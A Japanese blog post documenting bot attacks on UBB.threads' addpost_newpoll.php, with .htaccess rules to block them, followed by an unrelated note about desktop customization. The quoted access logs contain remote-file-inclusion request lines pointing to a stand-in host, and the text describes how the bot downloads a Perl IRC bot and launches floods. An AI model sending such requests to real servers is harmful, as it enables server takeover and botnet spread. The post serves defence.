BlogなどのWebサイトを開設していれば、トラックバック/リファラSPAMやら、不正侵入を試みるアタック等に晒されるのは世の常ですが、最近addpost_newpoll.phpへのアタックが多くて、対策をしたのでそのメモ。
addpost_newpoll.phpへのアタックのメモ □ addpost_newpoll.phpとは UBB.threadsというPHPで書かれたネットフォーラム用のソフトウェアに 含まれるファイル名。 この脆弱性をはじめ、いくつかの脆弱性があるが アタックは上記の脆弱性を狙ったもの。日本国内では、採用されているケースは 少ないと思われるが、海外フォーラムではたまに見かける。 □ addpost_newpoll.phpへのアタックとは 下記の例のようなリクエストとUser-Agentが、ログに記録される。 おそらくBotによるアタックと思われ、Perlで記述されているスクリプトのため User-Agentにはlibwww-perlなどのものが残る。 -------------------------------------------- $ grep addpost access_log | cut -d ' ' -f7,12- : //addpost_newpoll.php?addpoll=preview&thispath=http://example.com/shop/data/id.txt? "libwww-perl/5.79" /diary//addpost_newpoll.php?addpoll=preview&thispath=http://example.com/shop/data/id.txt? "libwww-perl/5.79" -------------------------------------------- 上記のようなリクエストを送ることによって、脆弱性のあるバージョンの UBB.threadsを使用していた場合は、上記で指定されたphpスクリプトファイルを 実行してしまう。phpスクリプト中では、exec/shell_exec/system/passthru/popenなど の関数を利用してコマンド実行を試し、wget/curl/lwp-donwload/lynx/fetch/GETなど のコマンド等を利用して、OS名/ユーザID/ディスク空き容量の取得、ならびに /tmp以下へのbot用Perlスクリプトのダウンロード/実行を試みる。 ダウンロードに成功した場合は、/tmp以下のファイルを削除し、潜伏活動に入る。 また、bot用Perlスクリプトでは、IRCに接続してIRC経由での 指令を受け取り、httpflood/tcpflood/udpfloodなどのDDoS攻撃を行ったり、 www.google.comにクエリを投げてURLを取得し、他のサイトへのbot拡大活動を行う。 |悪意のあるリクエスト|--->|外部のphpスクリプトの実行|---->|bot用Perlスクリプトのダウンロードと実行|-- -->|脆弱なサイトの捜索(bot活動)|--..(繰り返し) □ 上記のようなアタックへの対策 脆弱性のあるバージョンのウェブアプリを実行せず、常にセキュリティ情報に 気をつけて、必要に応じてバージョンアップを行うこと。 また、サーバ上で不要なウェブアプリが動作していないか/アクセス可能になっていないか 気を配ってサーバ管理を行うこと。 ログ/サーバ稼働状況を監視し、不正なアクセスに対してきちんとした対策を行うこと。 脆弱なアプリケーションがない場合、Webサーバのログにbotのログが 残るんですが、害がないとはいえ、404エラー(File not found)のままに しておくのもしゃくだったので、SetEnvIfで明示的に拒否。 下記の内容を、.htaccessに追加。 ------------------------------------------------ # Limit by Request_URI SetEnvIf Request_URI "addpost_newpoll" BOT Order Allow,Deny Allow from all Deny from env=BOT ------------------------------------------------ また、今回のaddpost_newpoll.phpのbotの場合は User-Agentがlibwww-perlのものであるケースが多かったので ------------------------------------------------ SetEnvIf User-Agent "libwww-perl" BOT Order Allow,Deny Allow from all Deny from env=BOT ------------------------------------------------ などのようにして、全て拒否してしまう手もある。 (ただし、正しい目的でlibwww-perlを利用しているユーザのアクセスも 禁止してしまうことになるので注意。また、botが利用するUser-Agentは この限りではないので、根本的な対策ではない。) □ 参考URL JPCERT CC - マルウェアの最近の傾向と、ウェブアプリケーションの脆弱性を狙うボットの実態(PDF) http://www.jpcert.or.jp/research/2007/recent_malware_trend.pdf □ おまけ 下記のようなログも残っていたので、www827のさくらたんサーバを利用している 人の中に、bot感染している?人がいるようですよ。 すでに、さくらのサーバ管理者によって対策されたかもしれませんが。 www827.sakura.ne.jp - - [07/Feb/2008:22:40:24 +0900] "GET /myPHPCalendar/admin.php? cal_dir=http://example.com/shop/data/id.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
Piroたんのデスクトップ百景発見..って、2007年11月のネタですね。え?そんなネタも知らなかったの?時代遅れor情報収集力不足だって? いいんです、後からネタを発掘するのも、これまた楽しみなんデス。だって、知らないことがたくさんあった方が楽しいじゃん。
ITmedia - デスクトップ百景 第四十五景:カスタマイズしなきゃ気がすまない? 超・自分本位のデスクトップ http://bb.watch.impress.co.jp/cda/desktop/20111.html